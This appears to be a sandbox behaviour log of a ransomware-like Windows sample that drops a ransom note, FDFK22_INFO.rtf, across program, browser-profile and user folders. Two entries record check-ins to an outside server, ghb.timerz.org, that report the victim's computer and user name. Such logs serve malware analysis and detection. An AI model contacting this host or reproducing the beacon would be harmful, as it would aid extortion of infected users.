a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\ProgramData\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\jdk1.7.0_80_x64\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Update\Install\{5DF2DCA9-BD54-4513-9B32-2C551D72B961}\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Public\Libraries\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\RBDIK06K\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tnk39ho.Admin\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\Videos\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Public\Videos\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Public\Desktop\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe HTTP URL 5 http://ghb.timerz.org/addrecord.php?apikey=fdfk22_api_key&compuser=AVGLFESB|Admin&sid=QDt9lZpMWmiaUx2c&phase=[ALL]659FAAE06715E629 Process not Found File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\security\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\TGVUK4BG\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\America\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\Desktop\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Mozilla Firefox\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\storage\permanent\chrome\idb\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Extensions\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\storage\default\moz-extension+++0b99e65e-22a6-4b3f-a101-8818eb39c6a0^userContextId=4294967295\idb\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Protect\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\storage\permanent\chrome\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\Saved Games\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\storage\default\moz-extension+++0b99e65e-22a6-4b3f-a101-8818eb39c6a0^userContextId=4294967295\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Public\Recorded TV\Sample Media\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Public\Documents\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe HTTP URL 9 http://ghb.timerz.org/addrecord.php?apikey=fdfk22_api_key&compuser=AVGLFESB|Admin&sid=QDt9lZpMWmiaUx2c&phase=FINISH Process not Found File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Public\Pictures\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Public\Videos\Sample Videos\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\bin\server\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\Contacts\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\ext\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\ProgramData\Mozilla\updates\308046B0AF4A39CB\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Installer\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\Favorites\Windows Live\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Public\Music\Sample Music\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\jfr\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Public\Pictures\Sample Pictures\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\datareporting\archived\2020-06\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\FDFK22_INFO.rtf 